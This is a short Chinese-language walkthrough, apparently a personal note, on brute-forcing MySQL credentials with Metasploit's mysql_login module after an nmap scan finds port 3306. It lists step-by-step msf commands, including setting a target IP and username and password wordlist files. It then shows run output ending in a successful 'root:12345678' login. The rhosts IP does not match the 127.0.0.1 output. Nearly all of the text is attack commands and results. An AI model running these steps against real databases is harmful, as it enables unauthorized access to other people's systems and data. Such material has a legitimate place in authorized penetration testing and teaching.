msf mysql port:3306

1. nmap扫出3306端口的话，就往下；

2. 搜索漏洞

msf > search  mysql_login

3. 使用该漏洞

msf > use auxiliary/scanner/mysql/mysql_login

4. 查看该漏洞用法

msf auxiliary(mysql_login) > show options

5. 向rhosts输入ip，看到可以正常访问mysql

msf auxiliary(mysql_login) > set rhosts 121.42.27.192

6. 找一个测试爆破的用户名字典和密码字典进行爆破

msf auxiliary(mysql_login) > set user_file  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  

msf auxiliary(mysql_login) > set pass_file   /usr/share/sparta/wordlists/mysql-default-userpass.txt  

7. run

msf auxiliary(mysql_login) > run

# 运行可以查看到mysql版本为 MySQL version 5.7.29
[+] 127.0.0.1:3306        - 127.0.0.1:3306 - Found remote MySQL version 5.7.29
[-] 127.0.0.1:3306        - 127.0.0.1:3306 - LOGIN FAILED: root: (Incorrect: Access denied for user 'root'@'localhost' (using password: NO))
......
[-] 127.0.0.1:3306        - 127.0.0.1:3306 - LOGIN FAILED: root:111 (Incorrect: Access denied for user 'root'@'localhost' (using password: YES))
[+] 127.0.0.1:3306        - 127.0.0.1:3306 - Success: 'root:12345678'
[*] 127.0.0.1:3306        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# 看到绿色加号[+] 即为破解成功！